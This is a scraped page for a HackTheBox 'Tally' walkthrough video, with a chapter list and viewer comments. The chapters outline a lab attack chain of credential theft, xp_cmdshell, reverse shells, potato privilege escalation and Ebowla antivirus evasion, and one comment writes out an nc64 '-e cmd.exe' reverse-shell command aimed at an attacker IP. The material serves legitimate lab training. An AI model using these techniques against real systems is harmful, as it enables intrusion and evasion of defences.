HackTheBox - Tally
Рет қаралды 39,414
Күн бұрын01:45 - Start of NMAP
04:17 - Begin of Sharepoint/GoBuster (Special Sharepoint List)
06:32 - Manually browsing to Sitecontent (Get FTP Creds)
10:18 - Mirror FTP + Pillage for information, Find keypass in Tim's directory and crack it.
18:22 - Mounting/Mirroring ACCT Share with found Creds and finding hardcoded SQL Creds
25:24 - Logging into MSSQL with SQSH, enabling xp_cmdshell and getting a Nishang Rev Shell
34:35 - Finding SPBestWarmUp.ps1 Scheduled Task that runs as Administrator
40:00 - Begin of RottenPotato without MSF (Decoder's Lonely Potato)
45:56 - Using Ebowla Encoding for AV Evasion to create an exe for use with Lonely Potato
58:00 - Lonely Potato Running to return a Admin Shell
BOX DONE
01:04:22 - Finding CVE-2017-0213
01:08:33 - Installing Visual Studio 2015 && Compiling the exploit
01:15:50 - Exploit Compiled, trying to get it to work....
01:18:11 - Just noticed the SPBestWarmUp.ps1 executed and gave us a shell!
01:28:37 - Found the issue, exploit seems to require interactive process
01:30:00 - Begin of Firefox Exploit Cluster (Not recommended to watch lol). It's a second unreliable way to get user
@exit81dave 6 жыл бұрын
Ill need to watch this one several times to note all the awesome things I just learned.
@JohnOmbagi 6 жыл бұрын
Wow! You are a great resource, man! This box screwed most of my nights and I couldn't root it. Thanks for your time and knowledge exchange. You are awesome.
@IsAMank 6 жыл бұрын
Almost 2 hours, what a treat, and seriously a great box. Glad I got it before it retired!
@theamazingjay161 3 жыл бұрын
Good presentation - as usual. Thanks for that.
@mickymaninthehouse 6 жыл бұрын
Super interesting to watch!
@mehh5505 6 жыл бұрын
And tally is here finally
@ramandeepsingh-vn5fn 6 жыл бұрын
AWESOME! Was waiting for this!!!!!
@batcut 5 жыл бұрын
Wow Ippsec! This is the first time I've seen a video without dislikes :D
@kali888 5 жыл бұрын
6 months later and still only 1 dislike lol
@fsacer 6 жыл бұрын
In powershell you need to specify .\executable for it to run if executable is not in PATH. also & operator is sometimes useful. Invoke-WebRequest is new to powershell 3. Usually stack is called LIFO (Last In - First Out).
@문석철-x3w 6 жыл бұрын
I always love your tutorial. I just hope you would explain exploit code more detail. Good job and many thanks!
@91dwest 6 жыл бұрын
Love your videos! Quick question, how do you know exactly what to look for while going through these boxes?
@alex_94-r2g 6 жыл бұрын
i always love windows box priv esc :D
@deathxe5 4 жыл бұрын
54:24 sheesh ebowla settle down
@Hitmonkey420 Жыл бұрын
Can't get scheduled task to run, have tried putting iex command as spbest as wall as putting the actual tcp oneliner script as spbest, it does not run at the hour. Do you have to enable the task?
@mohdamrirazlan7879 6 жыл бұрын
Thanks!
@ozh70 4 жыл бұрын
What is the command used in 6:01 to move the cursor up quickly ?
@TalsonHacks 3 жыл бұрын
CTRL+B, ‘Page Up’
@hokar4891 4 жыл бұрын
Does it matter about the powershell you were using and the CVE-2017-0213. you did the [environment] check but was wondering if you would have been able to launch the exploit, if you used SysNative's powershell to IEX reverse shell?
@snoopdeckin 6 жыл бұрын
Hi ippsec this is the error am getting during ebowla build root@kali:/opt/Ebowla# ./build_x64_go.sh output/go_symmetric_shell-9004.exe.go ebowla-shell-9004.exe [*] Copy Files to tmp for building [*] Building... ./build_x64_go.sh: line 25: go: command not found [*] Building complete [*] Copy ebowla-shell-9004.exe to output cp: cannot stat '/tmp/ebowla-shell-9004.exe': No such file or directory [*] Cleaning up rm: cannot remove '/tmp/ebowla-shell-9004.exe': No such file or directory [*] Done Later I tried to upload lonelypotatao.exe via meterpreter, loaded incognito, executed binary, but when I list tokens there is no nt authority system under impersonation.. tried several times.. pls suggest
@ippsec 6 жыл бұрын
Watch the haircut video and install go: ./build_x64_go.sh: line 25: go: command not found The above is saying Go is not installed
@bradleytough 4 жыл бұрын
Year too late to the party :( When I'm doing lonely potato, my Auth result is 0? Even then, not getting even a standard priv shell call back. Very odd :(
@algoquemole 4 жыл бұрын
yeah same... im not sure its applicable now lonelypotato.exe, i found juicypotato.exe and tried it, but windows doesnt recognize it as a valid application
@horizonholt8522 4 жыл бұрын
Since 3 months ago (as of today), the author of Lonely Potato (at github.com/decoder-it/lonelypotato) has said to switch to JuicyPotato. I personally used MSFRottenPotato.exe and it worked for me.
@tanuelorez2863 3 жыл бұрын
@@horizonholt8522 I tried with MSFRottenPotato.exe too...still got Auth result is 0
@paired7815 5 жыл бұрын
thanks ippsec ... I am not able to mount smb share ..Its saying readonly mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb mount: /mnt/smb: cannot mount //10.10.10.59/ACCT read-only.
@ippsec 5 жыл бұрын
I dont know. A quick google says to install smbfs and cifs-utils.
@paired7815 5 жыл бұрын
@@ippsec thanks ..it worked !!!
@kaungkhantnyinyi9579 4 жыл бұрын
I can't search MSRottenPotato.exe anywhere on google There's only .cpp file and I don't know how to compile
@MalikAbdullah-je9cp Жыл бұрын
same issue. Found a fix yet?
@davidkennedy4457 6 жыл бұрын
01:06:11 a few times in the videos you have this sound problem, first time on all your videos but on this one that make this 2-3 times ;)
@ippsec 6 жыл бұрын
Yeah no idea what happened here. Weird driver glitch I guess or maybe windows vm was trying to take mic
@krisrp0 4 жыл бұрын
How are you able to download the ftp mirror so quickly ? My system has been copying these files for the better part of an hour
@paired7815 5 жыл бұрын
Why a normal nc is not working here ? MSFRottenPotato.exe * "nc64.exe 10.10.14.XX 9001 -e cmd.exe"
@berndeckenfels 4 жыл бұрын
1:17:10 you can always use !ls in ftp client
@emmanuelkacou8099 5 жыл бұрын
hi ippsec, if there was no ftp on tally how will you process to upload file from kali to windows using powershell?
@ippsec 5 жыл бұрын
Sorry, those types of what if questions would never end so I don't answer them.
@emmanuelkacou8099 5 жыл бұрын
@@ippsec excuse me for asking this question.but if you can reply it will help more than one.
@ippsec 5 жыл бұрын
@@emmanuelkacou8099 The issue is this question could be applied to every video, and if i said something like well i guess you bruteforce a credential; it's followed up okay bruteforce did not work what next? If the questions take longer for me to answer than it does for the question asker to ask, it's a huge Denial of Service against me.
@emmanuelkacou8099 5 жыл бұрын
@@ippsec OK , no problem. i will try harder
@berndeckenfels 4 жыл бұрын
You can just use the Powershell web request or use bits to download it with http to the box.
@snoopdeckin 6 жыл бұрын
Your version of ebowla does not work, they say to downgrade..took 1 hour to try to fix the problem.. always returns error during build..
@ippsec 6 жыл бұрын
I’m guessing you’re missing a dependency. Works fine for me obviously, would help people if you shared what you did. Or the error message you got.
@snoopdeckin 6 жыл бұрын
IppSec a guy has already reported a error message on GitHub issue they suggested him to downgrade. I didnt attempt it..as I was confused. But this video is top best video of all series. It's just because of this ebowla I could not move forward.. will see what happens..
@pentestingarabiclanguage6717 6 жыл бұрын
hello can you help with a link to learn burp ? from beginner to advance please?:
@ippsec 6 жыл бұрын
Watch my videos from first to last. Popcorn may have what you’re looking for. If not then unfortunately I don’t have anything
@davidkennedy4457 6 жыл бұрын
and webpwnized is an awesome ressources kzbin.info/www/bejne/jKewioeHlNZgbNE
@冰羽-d1o 6 жыл бұрын
hello can you tell me how to install this box in kali
@ippsec 6 жыл бұрын
HackTheBox Videos are based off of machines on HackTheBox.eu -- Sign up for the site, and you will get a VPN Key to connect to the labs.
@冰羽-d1o 6 жыл бұрын
IppSec yes,i have signed up the website,but i see you open /documents/htb/boxes in the video,i don't konw what is this
@冰羽-d1o 6 жыл бұрын
IppSec do i need to install the box in my kali?how i install it?
@jippiedoe 6 жыл бұрын
You don't install anything, he made a folder (/htb/boxes) in his own machine to store anything that has to do with Tally in that folder.
@冰羽-d1o 6 жыл бұрын
jippiedoe but how can i open the website (such as 10.10.10.40),can you tell me
@Eric-the-wise 6 жыл бұрын
you were in PS when you were not able to run the exe, it has to be .\whatever.exe
@oTarrell13o 5 жыл бұрын
How do you hide your TMUX panes like that? Started using tmux after seeing your videos so I know the basics but I feel like knowing that one would be very beneficial when trying to copy into the clipboard. Also the clipboard thing you do is new to me as well. Didn't know you could have multiple items on the clipboard.
@mofogie 3 жыл бұрын
it means 'simply me' in spanish lol
@VulcanOnWheels 6 жыл бұрын
2:01 Again, shouldn't that be "I've already *run* it"? 4:56 As often as you use gobuster, I'm surprised that it's not in your path. 5:38 I don't see -h on the screen.
Yaqeen Institute
Рет қаралды 1 МЛН
BalcevMMA_BOXING
Рет қаралды 1,2 МЛН
НОВОСТНИЧОК
Рет қаралды 6 МЛН